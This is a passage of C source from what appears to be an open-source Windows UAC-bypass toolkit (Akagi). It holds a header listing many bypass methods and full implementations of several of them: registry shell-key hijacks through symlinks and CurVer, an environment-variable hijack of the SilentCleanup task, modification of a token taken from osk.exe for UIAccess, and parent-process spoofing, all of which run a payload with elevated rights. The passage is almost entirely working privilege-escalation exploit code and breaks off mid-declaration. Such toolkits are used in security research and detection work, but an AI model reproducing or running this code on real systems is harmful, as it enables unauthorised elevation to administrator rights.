* *******************************************************************************/ #pragma once NTSTATUS ucmGenericAutoelevationEx( _In_opt_ LPCWSTR lpTargetApp, _In_ LPCWSTR lpTargetDll, _In_opt_ LPCWSTR lpParameters, _In_opt_ LPCWSTR lpSubDirectory, _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize); NTSTATUS ucmGenericAutoelevation( _In_opt_ LPCWSTR lpTargetApp, _In_ LPCWSTR lpTargetDll, _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize); NTSTATUS ucmShellRegModMethod( _In_ UCM_METHOD Method, LPCWSTR lpTargetKey, LPCWSTR lpszTargetApp, LPCWSTR lpszPayload); NTSTATUS ucmShellRegModMethod2( _In_ UCM_METHOD Method, LPCWSTR lpTargetKey, LPCWSTR lpszTargetApp, LPCWSTR lpszPayload); NTSTATUS ucmShellRegModMethod3( LPCWSTR lpTargetKey, LPCWSTR lpszTargetApp, LPCWSTR lpszPayload); NTSTATUS ucmCMLuaUtilShellExecMethod( _In_ LPWSTR lpszExecutable); NTSTATUS ucmNICPoisonMethod( _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize); NTSTATUS ucmNICPoisonMethod2( _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize); NTSTATUS ucmIeAddOnInstallMethod( _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize); NTSTATUS ucmWscActionProtocolMethod( _In_ LPCWSTR lpszPayload); NTSTATUS ucmFwCplLuaMethod2( _In_ LPCWSTR lpszPayload); NTSTATUS ucmMsSettingsProtocolMethod( _In_ LPCWSTR lpszPayload); NTSTATUS ucmMsStoreProtocolMethod( _In_ LPCWSTR lpszPayload); NTSTATUS ucmPcaMethod( _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize); NTSTATUS ucmDirectoryMockMethod( _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize); NTSTATUS ucmHakrilMethod( _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize); NTSTATUS ucmSXSMethod( _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize, _In_opt_ LPWSTR lpTargetDirectory, _In_ LPWSTR lpTargetApplication, _In_opt_ LPWSTR lpLaunchApplication, _In_ BOOL bConsentItself); NTSTATUS ucmDismMethod( _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize); NTSTATUS ucmWow64LoggerMethod( _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize); NTSTATUS ucmUiAccessMethod( _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize); NTSTATUS ucmSXSDccwMethod( 
_In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize); NTSTATUS ucmCorProfilerMethod( _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize); NTSTATUS ucmDccwCOMMethod( _In_ LPWSTR lpszPayload); NTSTATUS ucmJunctionMethod( _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize); NTSTATUS ucmMsdtMethod( _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize); NTSTATUS ucmIscsiCplMethod( _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize); NTSTATUS ucmDotNetSerialMethod( _In_ LPWSTR lpszPayload); NTSTATUS ucmEditionUpgradeManagerMethod( _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize); NTSTATUS ucmDiskCleanupEnvironmentVariable( _In_ LPWSTR lpszPayload); NTSTATUS ucmTokenModUIAccessMethod( _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize); NTSTATUS ucmTokenModUIAccessMethod2( _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize); NTSTATUS ucmDebugObjectMethod( _In_ LPWSTR lpszPayload); NTSTATUS ucmVFServerTaskSchedMethod( _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize); NTSTATUS ucmVFServerDiagProfileMethod( _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize); BOOL ucmCreateCabinetForSingleFile( _In_ LPWSTR lpSourceDll, _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize, _In_opt_ LPWSTR lpInternalName); BOOL ucmWusaExtractViaJunction( _In_ LPWSTR lpTargetDirectory); NTSTATUS ucmAtlHijackMethod( _In_opt_ LPCWSTR lpTargetApp, _In_ LPCWSTR lpTargetDll, _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize); NTSTATUS ucmSspiDatagramMethod( _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize); NTSTATUS ucmRequestTraceMethod( _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize); NTSTATUS ucmQuickAssistMethod( _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize); // // Post execution cleanup routines. 
// BOOL ucmMethodCleanupSingleItemSystem32( _In_ LPCWSTR lpItemName, _In_opt_ LPCWSTR lpSubDirectory); BOOL ucmJunctionMethodCleanup( VOID); BOOL ucmSXSDccwMethodCleanup( VOID); BOOL ucmSXSMethodCleanup( VOID); VOID ucmDismMethodCleanup( VOID); BOOL ucmHakrilMethodCleanup( VOID); VOID ucmWusaCabinetCleanup( VOID); VOID ucmIscsiCplMethodCleanup( VOID); ================================================ FILE: Source/Akagi/methods/shellsup.c ================================================ /******************************************************************************* * * (C) COPYRIGHT AUTHORS, 2016 - 2023 * * TITLE: SHELLSUP.C * * VERSION: 3.69 * * DATE: 07 Jul 2025 * * Shell registry hijack autoelevation methods. * * Used by various malware. * * For description please visit original URL * https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ * https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/ * https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/ * https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/ * https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/ * http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass * https://www.activecyber.us/1/post/2019/03/windows-uac-bypass.html * https://packetstormsecurity.com/files/155927/Microsoft-Windows-10-Local-Privilege-Escalation.html * https://v3ded.github.io/redteam/utilizing-programmatic-identifiers-progids-for-uac-bypasses * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A * PARTICULAR PURPOSE. * *******************************************************************************/ #include "global.h" /* * ucmxSetSlaveParams * * Purpose: * * Set slave key parameters. 
* */ NTSTATUS ucmxSetSlaveParams( _In_ HANDLE KeyHandle, _In_ LPCWSTR Payload ) { NTSTATUS ntStatus = STATUS_ACCESS_DENIED; SIZE_T sz; DWORD cbData, dummy; dummy = 0; cbData = 0; ntStatus = supRegWriteValue(KeyHandle, T_DELEGATEEXECUTE, REG_SZ, &dummy, cbData); if (NT_SUCCESS(ntStatus)) { // // Set "Default" value as our payload. // sz = (1 + _strlen(Payload)) * sizeof(WCHAR); ntStatus = supRegWriteValue(KeyHandle, NULL, REG_SZ, (PVOID)Payload, (ULONG)sz); } return ntStatus; } /* * ucmxCreateSlaveKey * * Purpose: * * Create temporary key with all required values. * */ NTSTATUS ucmxCreateSlaveKey( _In_ HANDLE RootKey, _In_ LPCWSTR Payload, _Inout_ LPWSTR SlaveKey //cch max MAX_PATH ) { NTSTATUS ntStatus = STATUS_ACCESS_DENIED; GUID guidTemp; LPWSTR lpGuidKey = NULL; HKEY hKey; SIZE_T sz; do { if (CoCreateGuid(&guidTemp) != S_OK) break; if (StringFromCLSID(&guidTemp, &lpGuidKey) != S_OK) break; sz = (1 + _strlen(lpGuidKey)) * sizeof(WCHAR); _strncpy(SlaveKey, MAX_PATH, lpGuidKey, MAX_PATH); // // Slave key with data. // if (ERROR_SUCCESS == RegCreateKey(RootKey, lpGuidKey, &hKey)) { ntStatus = ucmxSetSlaveParams(hKey, Payload); RegCloseKey(hKey); } } while (FALSE); CoTaskMemFree(lpGuidKey); return ntStatus; } /* * ucmShellRegModMethod * * Purpose: * * Bypass UAC using various registry shell key modifications. 
* */ NTSTATUS ucmShellRegModMethod( _In_ UCM_METHOD Method, LPCWSTR lpTargetKey, LPCWSTR lpszTargetApp, LPCWSTR lpszPayload ) { NTSTATUS MethodResult = STATUS_ACCESS_DENIED; BOOLEAN bSlaveCreated = FALSE; NTSTATUS ntStatus = STATUS_ACCESS_DENIED; HANDLE masterRootKey = NULL, classesKey = NULL, targetKey = NULL; OBJECT_ATTRIBUTES obja; UNICODE_STRING usCurrentUser, usMasterKey, usSlaveKey; WCHAR szSlaveKey[MAX_PATH * 2]; WCHAR szMasterKey[MAX_PATH * 2]; WCHAR szClasses[MAX_PATH]; WCHAR szBuffer[MAX_PATH * 2]; SHELLEXECUTEINFO shinfo; LPWSTR lpSlaveNtKey = NULL; DWORD dummy; SIZE_T sz; UNICODE_STRING CmSymbolicLinkValue = RTL_CONSTANT_STRING(L"SymbolicLinkValue"); HRESULT hr_init; hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED); RtlSecureZeroMemory(&szSlaveKey, sizeof(szSlaveKey)); #ifndef _WIN64 if (g_ctx->IsWow64) { ntStatus = supEnableDisableWow64Redirection(TRUE); if (!NT_SUCCESS(ntStatus)) return ntStatus; } #endif do { // // Remember current user reg name. // ntStatus = RtlFormatCurrentUserKeyPath(&usCurrentUser); if (!NT_SUCCESS(ntStatus)) break; // // Open classes root. // ntStatus = supOpenClassesKey(&usCurrentUser, &classesKey); if (!NT_SUCCESS(ntStatus)) break; // // Create slave key. // szSlaveKey[0] = L'\\'; szSlaveKey[1] = 0; ntStatus = ucmxCreateSlaveKey( classesKey, lpszPayload, &szSlaveKey[1]); if (!NT_SUCCESS(ntStatus)) break; bSlaveCreated = TRUE; // // Allocate slave NT regpath. 
// sz = (MAX_PATH + _strlen(szSlaveKey) * sizeof(WCHAR)) + usCurrentUser.MaximumLength; lpSlaveNtKey = (PWSTR)supHeapAlloc(sz); if (lpSlaveNtKey == NULL) break; RtlInitEmptyUnicodeString(&usSlaveKey, lpSlaveNtKey, sz); ntStatus = RtlAppendUnicodeStringToString(&usSlaveKey, &usCurrentUser); if (!NT_SUCCESS(ntStatus)) break; szClasses[0] = L'\\'; szClasses[1] = 0; _strcpy(&szClasses[1], T_SOFTWARE_CLASSES); ntStatus = RtlAppendUnicodeToString(&usSlaveKey, szClasses); if (!NT_SUCCESS(ntStatus)) break; ntStatus = RtlAppendUnicodeToString(&usSlaveKey, szSlaveKey); if (!NT_SUCCESS(ntStatus)) break; // // Create empty master key. // _strncpy(szMasterKey, MAX_PATH, lpTargetKey, MAX_PATH); _strcat(szMasterKey, T_SHELL_OPEN); if (ERROR_SUCCESS != RegCreateKeyEx(classesKey, szMasterKey, 0, NULL, REG_OPTION_NON_VOLATILE, MAXIMUM_ALLOWED, NULL, (HKEY*)&masterRootKey, NULL)) { break; } // // Open/create master key. // RtlInitUnicodeString(&usMasterKey, T_SHELL_COMMAND); InitializeObjectAttributes(&obja, &usMasterKey, OBJ_CASE_INSENSITIVE, masterRootKey, NULL); ntStatus = NtCreateKey(&targetKey, KEY_ALL_ACCESS, &obja, 0, NULL, REG_OPTION_CREATE_LINK | REG_OPTION_VOLATILE, &dummy); // // If link already created, update it. 
// if (ntStatus == STATUS_OBJECT_NAME_COLLISION) { obja.Attributes |= OBJ_OPENLINK; ntStatus = NtOpenKey(&targetKey, KEY_ALL_ACCESS, &obja); } if (!NT_SUCCESS(ntStatus)) break; sz = _strlen(usSlaveKey.Buffer) * sizeof(WCHAR); ntStatus = NtSetValueKey(targetKey, &CmSymbolicLinkValue, 0, REG_LINK, (PVOID)usSlaveKey.Buffer, (ULONG)usSlaveKey.Length); if (!NT_SUCCESS(ntStatus)) break; NtClose(targetKey); targetKey = NULL; if ((Method == UacMethodShellChangePk) || (Method == UacMethodShellSdclt)) { _strcpy(szBuffer, g_ctx->szSystemDirectory); _strcat(szBuffer, lpszTargetApp); RtlSecureZeroMemory(&shinfo, sizeof(shinfo)); shinfo.cbSize = sizeof(shinfo); shinfo.lpVerb = RUNAS_VERB; shinfo.lpFile = szBuffer; shinfo.nShow = SW_SHOWNORMAL; shinfo.fMask = SEE_MASK_NOCLOSEPROCESS; if (ShellExecuteEx(&shinfo)) { Sleep(5000); TerminateProcess(shinfo.hProcess, 0); CloseHandle(shinfo.hProcess); MethodResult = STATUS_SUCCESS; } } else { if (supRunProcess(lpszTargetApp, NULL)) MethodResult = STATUS_SUCCESS; } } while (FALSE); if (targetKey) NtClose(targetKey); if (masterRootKey) NtClose(masterRootKey); if (lpSlaveNtKey) supHeapFree(lpSlaveNtKey); // // Cleanup slave key. // if (bSlaveCreated) { if (classesKey) { RegDeleteKey(classesKey, &szSlaveKey[1]);//skip slash } } if (classesKey) NtClose(classesKey); if (SUCCEEDED(hr_init)) CoUninitialize(); // // Remove symlink. // szMasterKey[0] = L'\\'; szMasterKey[1] = 0; _strcpy(&szMasterKey[1], T_SOFTWARE_CLASSES); _strcat(szMasterKey, TEXT("\\")); _strcat(szMasterKey, lpTargetKey); _strcat(szMasterKey, T_SHELL_OPEN); _strcat(szMasterKey, TEXT("\\")); _strcat(szMasterKey, T_SHELL_COMMAND); supRemoveRegLinkHKCU(szMasterKey); #ifndef _WIN64 if (g_ctx->IsWow64) { supEnableDisableWow64Redirection(FALSE); } #endif return MethodResult; } /* * ucmShellRegModMethod2 * * Purpose: * * Bypass UAC using various registry shell key modifications. 
* */ NTSTATUS ucmShellRegModMethod2( _In_ UCM_METHOD Method, LPCWSTR lpTargetKey, LPCWSTR lpszTargetApp, LPCWSTR lpszPayload ) { BOOLEAN bBackupAvailable = FALSE; NTSTATUS MethodResult = STATUS_ACCESS_DENIED, ntStatus; HANDLE hClassesRoot, hSubKey = NULL; DWORD dwDisp = 0; WCHAR szKey[MAX_PATH]; PWSTR pwszKey; UNREFERENCED_PARAMETER(Method); #ifndef _WIN64 if (g_ctx->IsWow64) { ntStatus = supEnableDisableWow64Redirection(TRUE); if (!NT_SUCCESS(ntStatus)) return ntStatus; } #endif do { ntStatus = supOpenClassesKey(NULL, &hClassesRoot); if (!NT_SUCCESS(ntStatus)) break; RtlSecureZeroMemory(&szKey, sizeof(szKey)); _strcpy(szKey, lpTargetKey); _strcat(szKey, T_SHELL_OPEN); _strcat(szKey, TEXT("\\")); _strcat(szKey, T_SHELL_COMMAND); // // If "command" key exist - backup it. // if (ERROR_SUCCESS == RegOpenKeyEx(hClassesRoot, szKey, 0, MAXIMUM_ALLOWED, (HKEY*)&hSubKey)) { RegCloseKey(hSubKey); bBackupAvailable = (RegRenameKey(hClassesRoot, szKey, MYSTERIOUSCUTETHING) == ERROR_SUCCESS); } _strcat(szKey, TEXT("~")); hSubKey = NULL; if (ERROR_SUCCESS != RegCreateKeyEx(hClassesRoot, szKey, 0, NULL, REG_OPTION_NON_VOLATILE, MAXIMUM_ALLOWED, NULL, (HKEY*)&hSubKey, &dwDisp)) { break; } ntStatus = ucmxSetSlaveParams(hSubKey, lpszPayload); if (!NT_SUCCESS(ntStatus)) break; RegCloseKey(hSubKey); hSubKey = NULL; RegRenameKey(hClassesRoot, szKey, T_SHELL_COMMAND); if (supRunProcess(lpszTargetApp, NULL)) MethodResult = STATUS_SUCCESS; } while (FALSE); if (hSubKey) RegCloseKey(hSubKey); // // Cleanup section. 
    //
    _strcpy(szKey, lpTargetKey);
    _strcat(szKey, T_SHELL_OPEN);
    _strcat(szKey, TEXT("\\"));

    if (bBackupAvailable) {
        pwszKey = _strend(szKey);
        _strcat(szKey, T_SHELL_COMMAND);
        RegDeleteKey(hClassesRoot, szKey);
        *pwszKey = 0;
        _strcat(szKey, MYSTERIOUSCUTETHING);
        RegRenameKey(hClassesRoot, szKey, T_SHELL_COMMAND);
    }
    else {
        _strcat(szKey, T_SHELL_COMMAND);
        RegDeleteKey(hClassesRoot, szKey);
    }

    if (hClassesRoot) NtClose(hClassesRoot);

#ifndef _WIN64
    if (g_ctx->IsWow64) {
        supEnableDisableWow64Redirection(FALSE);
    }
#endif

    return MethodResult;
}

/*
* ucmShellRegModMethod3
*
* Purpose:
*
* Bypass UAC using registry shell key CurVer progId.
*
*/
NTSTATUS ucmShellRegModMethod3(
    LPCWSTR lpTargetKey,
    LPCWSTR lpszTargetApp,
    LPCWSTR lpszPayload
)
{
    NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
    HANDLE hClassesRoot = NULL, hSubKey = NULL; // initialized so the cleanup path is safe if supOpenClassesKey fails
    SIZE_T sz;
    WCHAR szKey[MAX_PATH];

#ifndef _WIN64
    if (g_ctx->IsWow64) {
        MethodResult = supEnableDisableWow64Redirection(TRUE);
        if (!NT_SUCCESS(MethodResult))
            return MethodResult;
    }
#endif

    do {

        MethodResult = supOpenClassesKey(NULL, &hClassesRoot);
        if (!NT_SUCCESS(MethodResult))
            break;

        RtlSecureZeroMemory(&szKey, sizeof(szKey));

        //
        // Prepare registry key for a new handler.
        //
        _strcpy(szKey, ABSOLUTEWIN);
        _strcat(szKey, T_SHELL_OPEN);
        _strcat(szKey, TEXT("\\"));
        _strcat(szKey, T_SHELL_COMMAND);

        //
        // Reset the result so a RegCreateKeyEx failure is caught by the check below.
        //
        MethodResult = STATUS_ACCESS_DENIED;

        if (ERROR_SUCCESS == RegCreateKeyEx(hClassesRoot,
            szKey,
            0,
            NULL,
            REG_OPTION_NON_VOLATILE,
            MAXIMUM_ALLOWED,
            NULL,
            (HKEY*)&hSubKey,
            NULL))
        {
            sz = (1 + _strlen(lpszPayload)) * sizeof(WCHAR);
            MethodResult = supRegWriteValue(hSubKey, NULL, REG_SZ, (PVOID)lpszPayload, (DWORD)sz);
            RegCloseKey(hSubKey);
        }

        if (!NT_SUCCESS(MethodResult))
            break;

        //
        // Set CurVer to target key.
        //
        hSubKey = NULL;
        _strcpy(szKey, lpTargetKey);
        _strcat(szKey, TEXT("\\"));
        _strcat(szKey, T_CURVER);

        if (ERROR_SUCCESS == RegCreateKeyEx(hClassesRoot,
            szKey,
            0,
            NULL,
            REG_OPTION_NON_VOLATILE,
            MAXIMUM_ALLOWED,
            NULL,
            (HKEY*)&hSubKey,
            NULL))
        {
            sz = (1 + _strlen(ABSOLUTEWIN)) * sizeof(WCHAR);
            MethodResult = supRegWriteValue(hSubKey, NULL, REG_SZ, (PVOID)ABSOLUTEWIN, (DWORD)sz);
            if (NT_SUCCESS(MethodResult)) {
                if (supRunProcess(lpszTargetApp, NULL))
                    MethodResult = STATUS_SUCCESS;
            }
            RegCloseKey(hSubKey);
            RegDeleteKey(hClassesRoot, szKey);
        }

    } while (FALSE);

    if (hClassesRoot) {
        supRegDeleteKeyRecursive(hClassesRoot, ABSOLUTEWIN);
        NtClose(hClassesRoot);
    }

#ifndef _WIN64
    if (g_ctx->IsWow64) {
        supEnableDisableWow64Redirection(FALSE);
    }
#endif

    return MethodResult;
}

================================================
FILE: Source/Akagi/methods/tyranid.c
================================================
/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2017 - 2025
*
*  TITLE:       TYRANID.C
*
*  VERSION:     3.69
*
*  DATE:        07 Jul 2025
*
*  James Forshaw autoelevation method(s)
*  Fine Dining Tool (c) CIA
*
*  For description please visit original URL
*  https://tyranidslair.blogspot.ru/2017/05/exploiting-environment-variables-in.html
*  https://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-1.html
*  https://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-2.html
*  https://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-3.html
*  https://tyranidslair.blogspot.com/2019/02/accessing-access-tokens-for-uiaccess.html
*  https://googleprojectzero.blogspot.com/2019/12/calling-local-windows-rpc-servers-from.html
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"

/*
* ucmDiskCleanupEnvironmentVariable
*
* Purpose:
*
* DiskCleanup task uses current user environment variables to build a path to the executable.
* Warning: this method works with AlwaysNotify UAC level.
*
*/
NTSTATUS ucmDiskCleanupEnvironmentVariable(
    _In_ LPWSTR lpszPayload
)
{
    NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
    WCHAR szEnvVariable[MAX_PATH * 2];
    PWCHAR psz;
    BOOL quoteFix;

    do {

        if (_strlen(lpszPayload) > MAX_PATH)
            return STATUS_INVALID_PARAMETER;

        RtlSecureZeroMemory(szEnvVariable, sizeof(szEnvVariable));

        quoteFix = (g_ctx->dwBuildNumber >= NT_WIN10_21H2);

        //
        // Add quotes.
        //
        szEnvVariable[0] = L'\"';
        psz = &szEnvVariable[!!quoteFix];
        _strncpy(&szEnvVariable[1], MAX_PATH, lpszPayload, MAX_PATH);
        _strcat(szEnvVariable, L"\"");

        //
        // Set our controlled env.variable with payload.
        //
        if (!supSetEnvVariableEx(FALSE, NULL, T_WINDIR, psz))
            break;

        //
        // Run trigger task.
        //
        if (supStartScheduledTask(L"\\Microsoft\\Windows\\DiskCleanup", L"SilentCleanup"))
            MethodResult = STATUS_SUCCESS;

        //
        // Cleanup our env.variable.
        //
        supSetEnvVariableEx(TRUE, NULL, T_WINDIR, NULL);

    } while (FALSE);

    return MethodResult;
}

/*
* ucmxTokenModUIAccessMethodInitPhase
*
* Purpose:
*
* Convert dll to new entrypoint/exe.
* */ BOOL ucmxTokenModUIAccessMethodInitPhase( _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize, _In_ LPCSTR EntryPointName, _In_ LPCWSTR PayloadFileName ) { BOOL bResult = FALSE; WCHAR szBuffer[MAX_PATH * 2]; // // Patch Fubuki to the new entry point and convert to EXE // if (supReplaceDllEntryPoint(ProxyDll, ProxyDllSize, EntryPointName, TRUE)) { // // Drop modified Fubuki to the %temp% // RtlSecureZeroMemory(szBuffer, sizeof(szBuffer)); _strcpy(szBuffer, g_ctx->szTempDirectory); _strcat(szBuffer, PayloadFileName); bResult = supWriteBufferToFile(szBuffer, ProxyDll, ProxyDllSize); } return bResult; } /* * ucmxTokenModUIAccessExec * * Purpose: * * Obtain token from UIAccess application, modify it and reuse for UAC bypass. * */ NTSTATUS ucmxTokenModUIAccessExec( _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize, _In_ LPCSTR EntryPointName, _In_ LPCWSTR PayloadFileName, _In_ UCM_METHOD Method ) { NTSTATUS Status = STATUS_ACCESS_DENIED; LPWSTR lpszPayload = NULL; PSID pIntegritySid = NULL; HANDLE hDupToken = NULL, hProcessToken = NULL; SHELLEXECUTEINFO shinfo; SID_IDENTIFIER_AUTHORITY MLAuthority = SECURITY_MANDATORY_LABEL_AUTHORITY; TOKEN_MANDATORY_LABEL tml; SECURITY_QUALITY_OF_SERVICE sqos; OBJECT_ATTRIBUTES obja; WCHAR szBuffer[MAX_PATH * 2]; STARTUPINFO si; PROCESS_INFORMATION pi; RtlSecureZeroMemory(&shinfo, sizeof(shinfo)); do { // // Tweak and drop payload to %temp%. // if (!ucmxTokenModUIAccessMethodInitPhase(ProxyDll, ProxyDllSize, EntryPointName, PayloadFileName)) { break; } // // Spawn OSK.exe process. // _strcpy(szBuffer, g_ctx->szSystemDirectory); _strcat(szBuffer, OSK_EXE); shinfo.cbSize = sizeof(shinfo); shinfo.fMask = SEE_MASK_NOCLOSEPROCESS; shinfo.lpFile = szBuffer; shinfo.nShow = SW_HIDE; if (!ShellExecuteEx(&shinfo)) break; // // Open process token. // Status = NtOpenProcessToken(shinfo.hProcess, TOKEN_DUPLICATE | TOKEN_QUERY, &hProcessToken); if (!NT_SUCCESS(Status)) break; // // Duplicate primary token. 
// sqos.Length = sizeof(SECURITY_QUALITY_OF_SERVICE); sqos.ImpersonationLevel = SecurityImpersonation; sqos.ContextTrackingMode = 0; sqos.EffectiveOnly = FALSE; InitializeObjectAttributes(&obja, NULL, 0, NULL, NULL); obja.SecurityQualityOfService = &sqos; Status = NtDuplicateToken(hProcessToken, TOKEN_ALL_ACCESS, &obja, FALSE, TokenPrimary, &hDupToken); if (!NT_SUCCESS(Status)) break; NtClose(hProcessToken); hProcessToken = NULL; NtTerminateProcess(shinfo.hProcess, STATUS_SUCCESS); NtClose(shinfo.hProcess); shinfo.hProcess = NULL; // // Lower duplicated token IL from Medium+ to Medium. // Status = RtlAllocateAndInitializeSid(&MLAuthority, 1, SECURITY_MANDATORY_MEDIUM_RID, 0, 0, 0, 0, 0, 0, 0, &pIntegritySid); if (!NT_SUCCESS(Status)) break; tml.Label.Attributes = SE_GROUP_INTEGRITY; tml.Label.Sid = pIntegritySid; Status = NtSetInformationToken(hDupToken, TokenIntegrityLevel, &tml, (ULONG)(sizeof(TOKEN_MANDATORY_LABEL) + RtlLengthSid(pIntegritySid))); if (!NT_SUCCESS(Status)) break; RtlSecureZeroMemory(&pi, sizeof(PROCESS_INFORMATION)); RtlSecureZeroMemory(&si, sizeof(STARTUPINFO)); si.cb = sizeof(STARTUPINFO); GetStartupInfo(&si); // // Run second stage exe to perform some gui hacks. 
// _strcpy(szBuffer, g_ctx->szTempDirectory); _strcat(szBuffer, PKGMGR_EXE); if (Method == UacMethodTokenModUiAccess) { if (g_ctx->OptionalParameterLength == 0) lpszPayload = g_ctx->szDefaultPayload; else lpszPayload = g_ctx->szOptionalParameter; } if (CreateProcessAsUser(hDupToken, szBuffer, //application lpszPayload, //command line NULL, NULL, FALSE, CREATE_DEFAULT_ERROR_MODE | NORMAL_PRIORITY_CLASS, NULL, NULL, &si, &pi)) { if (WaitForSingleObject(pi.hProcess, 10000) == WAIT_TIMEOUT) TerminateProcess(pi.hProcess, (UINT)-1); CloseHandle(pi.hThread); CloseHandle(pi.hProcess); Status = STATUS_SUCCESS; } } while (FALSE); if (hProcessToken) NtClose(hProcessToken); if (shinfo.hProcess) { NtTerminateProcess(shinfo.hProcess, STATUS_SUCCESS); NtClose(shinfo.hProcess); } if (hDupToken) NtClose(hDupToken); if (pIntegritySid) RtlFreeSid(pIntegritySid); _strcpy(szBuffer, g_ctx->szTempDirectory); _strcat(szBuffer, PayloadFileName); DeleteFile(szBuffer); return Status; } /* * ucmTokenModUIAccessMethod * * Purpose: * * Obtain token from UIAccess application, modify it and reuse for UAC bypass. * */ NTSTATUS ucmTokenModUIAccessMethod( _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize ) { return ucmxTokenModUIAccessExec(ProxyDll, ProxyDllSize, FUBUKI_ENTRYPOINT_UIACCESS2, PKGMGR_EXE, UacMethodTokenModUiAccess); } /* * ucmTokenModUIAccessMethod2 * * Purpose: * * Variant inspired by Stefan Kanthak findings. Based on same tyranid UIAccess bypass. 
* */ NTSTATUS ucmTokenModUIAccessMethod2( _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize ) { HKEY hKey; LRESULT lResult; NTSTATUS Status = STATUS_ACCESS_DENIED; SIZE_T sz; WCHAR szPayload[MAX_PATH * 2]; _strcpy(szPayload, g_ctx->szTempDirectory); _strcat(szPayload, THEOLDNEWTHING); _strcat(szPayload, TEXT(".dll")); if (supWriteBufferToFile(szPayload, ProxyDll, ProxyDllSize)) { hKey = NULL; lResult = RegCreateKeyEx(HKEY_CURRENT_USER, T_HTMLHELP_AUTHOR, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL); if (lResult == ERROR_SUCCESS) { sz = (1 + _strlen(szPayload)) * sizeof(WCHAR); lResult = RegSetValueEx(hKey, T_LOCATION, 0, REG_SZ, (BYTE*)szPayload, (DWORD)sz); if (lResult == ERROR_SUCCESS) { Status = ucmxTokenModUIAccessExec(ProxyDll, ProxyDllSize, FUBUKI_ENTRYPOINT_UIACCESS3, PKGMGR_EXE, UacMethodTokenModUiAccess2); } RegCloseKey(hKey); } RegDeleteKey(HKEY_CURRENT_USER, T_HTMLHELP_AUTHOR); DeleteFile(szPayload); } return Status; } /* * ucmxCreateProcessFromParent * * Purpose: * * Create new process using parent process handle. 
* */ NTSTATUS ucmxCreateProcessFromParent( _In_ HANDLE ParentProcess, _In_ LPWSTR Payload) { NTSTATUS status = STATUS_UNSUCCESSFUL; SIZE_T size = 0x30; STARTUPINFOEX si; PROCESS_INFORMATION pi; RtlSecureZeroMemory(&pi, sizeof(pi)); RtlSecureZeroMemory(&si, sizeof(si)); si.StartupInfo.cb = sizeof(STARTUPINFOEX); do { if (size > 1024) break; si.lpAttributeList = supHeapAlloc(size); if (si.lpAttributeList) { if (InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &size)) { if (UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &ParentProcess, sizeof(HANDLE), 0, 0)) //-V616 { si.StartupInfo.dwFlags = STARTF_USESHOWWINDOW; si.StartupInfo.wShowWindow = SW_SHOW; if (CreateProcess(NULL, Payload, NULL, NULL, FALSE, CREATE_UNICODE_ENVIRONMENT | EXTENDED_STARTUPINFO_PRESENT, NULL, g_ctx->szSystemRoot, (LPSTARTUPINFO)&si, &pi)) { CloseHandle(pi.hThread); CloseHandle(pi.hProcess); status = STATUS_SUCCESS; } } } if (si.lpAttributeList) DeleteProcThreadAttributeList(si.lpAttributeList); //dumb empty routine supHeapFree(si.lpAttributeList); } } while (GetLastError() == ERROR_INSUFFICIENT_BUFFER); return status; } /* * ucmDebugObjectMethod * * Purpose: * * Bypass UAC by direct RPC call to APPINFO and DebugObject use. * */ NTSTATUS ucmDebugObjectMethod( _In_ LPWSTR 